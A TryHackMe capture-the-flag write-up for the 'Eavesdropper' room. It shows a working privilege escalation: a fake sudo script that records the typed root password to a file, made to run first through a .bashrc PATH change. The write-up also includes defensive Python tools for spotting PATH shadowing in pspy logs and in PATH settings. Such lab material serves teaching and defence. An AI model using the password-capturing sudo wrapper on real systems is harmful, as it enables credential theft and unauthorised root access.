Eavesdropper - Write-up - TryHackMe

Information

Room

  • Name: Eavesdropper
  • Profile: tryhackme.com
  • Difficulty: Medium
  • Description: Listen closely, you might hear a password!

Write-up

Overview

Foothold

Connect over SSH and upload pspy, since we need to watch what is happening on the system; the expectation is a root cron job.

$ ssh frank@10.10.210.234 -i idrsa.id-rsa
$ scp -i idrsa.id-rsa pspy64 frank@10.10.210.234:pspy

Then we make it executable and run it.

frank@workstation:~$ chmod +x pspy
frank@workstation:~$ ./pspy

Look at the logs:

2023/02/04 12:01:55 CMD: UID=1000  PID=1413   | sshd: frank@pts/1
2023/02/04 12:01:56 CMD: UID=1000  PID=1414   | sshd: frank@pts/1
2023/02/04 12:01:57 CMD: UID=1000  PID=1415   | sshd: frank@pts/1
2023/02/04 12:01:58 CMD: UID=1000  PID=1416   | sshd: frank@pts/1
2023/02/04 12:01:58 CMD: UID=1000  PID=1417   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1418   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1419   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1420   | /bin/sh /etc/init.d/dbus status
2023/02/04 12:01:58 CMD: UID=1000  PID=1422   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1421   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1423   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1424   | /bin/sh /etc/init.d/hwclock.sh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1426   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1425   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1427   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1428   | /bin/sh /etc/init.d/procps status
2023/02/04 12:01:58 CMD: UID=1000  PID=1429   | /bin/sh /etc/init.d/procps status
2023/02/04 12:01:58 CMD: UID=1000  PID=1430   | /bin/sh /etc/init.d/procps status
2023/02/04 12:01:58 CMD: UID=1000  PID=1431   | /bin/sh /etc/init.d/procps status
2023/02/04 12:01:58 CMD: UID=1000  PID=1433   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1432   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1434   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1437   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1436   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1435   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1438   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1439   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1440   | /bin/sh /etc/init.d/ssh status
2023/02/04 12:01:58 CMD: UID=1000  PID=1442   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:58 CMD: UID=1000  PID=1441   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:01:59 CMD: UID=1000  PID=1443   | sshd: frank@pts/1
2023/02/04 12:02:00 CMD: UID=1000  PID=1444   | sshd: frank@pts/1
2023/02/04 12:02:00 CMD: UID=0     PID=1445   | sudo cat /etc/shadow
2023/02/04 12:02:20 CMD: UID=0     PID=1446   | sshd: [accepted]
2023/02/04 12:02:20 CMD: UID=0     PID=1447   | sshd: [accepted]
2023/02/04 12:02:20 CMD: UID=0     PID=1448   | sshd: frank [priv]
2023/02/04 12:02:20 CMD: UID=0     PID=1449   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2023/02/04 12:02:20 CMD: UID=0     PID=1450   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1451   | /bin/sh /etc/update-motd.d/00-header
2023/02/04 12:02:20 CMD: UID=0     PID=1452   | /bin/sh /etc/update-motd.d/00-header
2023/02/04 12:02:20 CMD: UID=0     PID=1453   | /bin/sh /etc/update-motd.d/00-header
2023/02/04 12:02:20 CMD: UID=0     PID=1454   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1455   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1456   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1457   | sshd: frank [priv]

This is odd: why would root use sudo? It looks like root is connecting through SSH to frank's account. There is probably a cron job executing sudo unattended, so we will be able to capture the root password by capturing the input. To do so we only have to change frank's PATH so that a rogue sudo command gets executed instead of the real one.
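The anomaly the log reveals (UID 0 invoking sudo, and root processes started by a bare command name that has to be resolved through PATH) is exactly what a defender reviewing pspy or auditd output would want to flag automatically. The following parser is an added example, not code from the write-up or from pspy; the sample lines are constructed in pspy's output format and modelled on the log above, and the `root_sudo_events` and `root_path_lookups` names are my own.

```python
import re

# Constructed sample in pspy's "CMD:" format, modelled on the write-up's log.
# The UID=0 "sudo" entry is the anomaly the write-up keys on.
SAMPLE_LOG = """\
2023/02/04 12:01:58 CMD: UID=1000  PID=1417   | /bin/sh /usr/sbin/service --status-all
2023/02/04 12:02:00 CMD: UID=1000  PID=1444   | sshd: frank@pts/1
2023/02/04 12:02:00 CMD: UID=0     PID=1445   | sudo cat /etc/shadow
2023/02/04 12:02:20 CMD: UID=0     PID=1448   | sshd: frank [priv]
2023/02/04 12:02:20 CMD: UID=0     PID=1449   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2023/02/04 12:02:20 CMD: UID=0     PID=1450   | run-parts --lsbsysinit /etc/update-motd.d
2023/02/04 12:02:20 CMD: UID=0     PID=1451   | /bin/sh /etc/update-motd.d/00-header
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\| (?P<cmd>.*)$"
)


def parse_pspy(text):
    """Turn pspy 'CMD:' lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": m["ts"], "uid": int(m["uid"]),
                           "pid": int(m["pid"]), "cmd": m["cmd"]})
    return events


def argv0(cmd):
    """First word of the command line, or '' for an empty command."""
    parts = cmd.split()
    return parts[0] if parts else ""


def is_process_title(name):
    """Daemons such as sshd rewrite their own title ('sshd: frank [priv]');
    those are status strings, not commands resolved through PATH."""
    return name.endswith(":")


def root_sudo_events(events):
    """UID 0 has no reason to call sudo; a root process doing so is usually an
    unattended script wrapping commands in sudo, which resolves 'sudo' via PATH."""
    return [e for e in events if e["uid"] == 0 and argv0(e["cmd"]) == "sudo"]


def root_path_lookups(events):
    """Root processes whose argv[0] is a bare name (no slash). Each of these was
    resolved through PATH and could be shadowed by a writable directory listed
    earlier in that PATH, which is the weakness the write-up goes on to use."""
    hits = []
    for e in events:
        name = argv0(e["cmd"])
        if e["uid"] == 0 and name and "/" not in name and not is_process_title(name):
            hits.append(e)
    return hits


if __name__ == "__main__":
    evts = parse_pspy(SAMPLE_LOG)
    for e in root_sudo_events(evts):
        print("root invoked sudo:", e["ts"], e["pid"], e["cmd"])
    for e in root_path_lookups(evts):
        print("root PATH lookup :", e["ts"], e["pid"], argv0(e["cmd"]))
```

Run against a saved pspy capture, the second list is the one to review on a hardened host: every root process launched by a bare name is a candidate for PATH shadowing, so the scripts behind them should call binaries by absolute path or set PATH explicitly, as the `env -i PATH=...` line in the log already does for the MOTD scripts.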

Elevation of privilege (EoP)

So let's prepare sudo hijacking.

frank@workstation:~$ mkdir bin
frank@workstation:~$ vim bin/sudo

The fake sudo reads the input typed at the prompt and writes it to a file, capturing the root password.

#!/bin/bash
# Prompt exactly like the real sudo would and read the typed password
read -p "noraj" password
# Store what was typed for later retrieval
echo "$password" > /home/frank/pass.txt

Then we change frank's PATH so that the fake sudo will be loaded before the real one.

frank@workstation:~$ chmod +x bin/sudo
frank@workstation:~$ vim .bashrc

At the top:

export PATH=/home/frank/bin:$PATH

Once the cron job has fired, read the captured password and use it with the real sudo to get a root shell:

frank@workstation:~$ cat pass.txt
EDITED
frank@workstation:~$ sudo bash
[sudo] password for frank:
root@workstation:/home/frank# cd
root@workstation:~# cat flag.txt
flag{EDITED}
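The whole chain works because a user-writable directory sits in front of the system directories in the PATH that the automated root process inherits. The audit below is an added example, not code from the write-up: it resolves a command the way a shell does (first match in PATH order) and reports every writable, non-system directory that was consulted before the match. The `demo()` fixture rebuilds the write-up's layout (a user-owned `bin/` holding a fake `sudo` ahead of the system directories) in a temporary directory; `audit_path`, `shadowing_risks` and the list of trusted directories are my own names and assumptions.

```python
import os
import tempfile
from dataclasses import dataclass


@dataclass
class PathEntry:
    directory: str
    has_command: bool   # an executable with the looked-up name exists here
    writable: bool      # the inspecting user can create files here


# Assumed set of system directories; adjust to the host's baseline PATH.
TRUSTED_DIRS = ("/usr/local/sbin", "/usr/local/bin", "/usr/sbin",
                "/usr/bin", "/sbin", "/bin")


def audit_path(path_value, command="sudo"):
    """Resolve `command` the way a shell does: first match wins, in PATH order.

    Returns (resolved_path_or_None, entries), where `entries` covers every
    directory searched up to and including the one that supplied the command,
    so the caller can see which writable directories were consulted first.
    """
    entries = []
    resolved = None
    for directory in path_value.split(os.pathsep):
        if directory == "":
            directory = "."        # an empty PATH element means the current directory
        candidate = os.path.join(directory, command)
        has_command = os.path.isfile(candidate) and os.access(candidate, os.X_OK)
        writable = os.path.isdir(directory) and os.access(directory, os.W_OK)
        entries.append(PathEntry(directory, has_command, writable))
        if has_command:
            resolved = candidate
            break
    return resolved, entries


def shadowing_risks(entries, trusted=TRUSTED_DIRS):
    """Searched directories that are writable by the current user and are not
    system directories: anything planted there shadows the real binary."""
    return [e.directory for e in entries if e.writable and e.directory not in trusted]


def demo():
    """Constructed fixture mirroring the write-up: a user-owned bin/ with a
    harmless placeholder 'sudo', placed ahead of the system directories."""
    with tempfile.TemporaryDirectory() as home:
        user_bin = os.path.join(home, "bin")
        os.mkdir(user_bin)
        fake = os.path.join(user_bin, "sudo")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")   # placeholder only, does nothing
        os.chmod(fake, 0o755)
        path_value = os.pathsep.join((user_bin,) + TRUSTED_DIRS)
        resolved, entries = audit_path(path_value, "sudo")
        return {
            "resolved_in_user_dir": resolved == fake,
            "risky_dirs": shadowing_risks(entries),
            "searched": len(entries),
        }


if __name__ == "__main__":
    print(demo())
    real_resolved, real_entries = audit_path(os.environ.get("PATH", ""), "sudo")
    print("sudo resolves to:", real_resolved)
    print("writable non-system dirs searched first:", shadowing_risks(real_entries))
```

Run without arguments it audits the caller's own PATH as well: a non-empty list from `shadowing_risks` on an account that a privileged job logs into is the condition the write-up exploits, and the fix on the defending side is the usual one, namely privileged scripts that call `/usr/bin/sudo` (or better, no sudo at all from root) and set their own PATH instead of inheriting the target user's `.bashrc`.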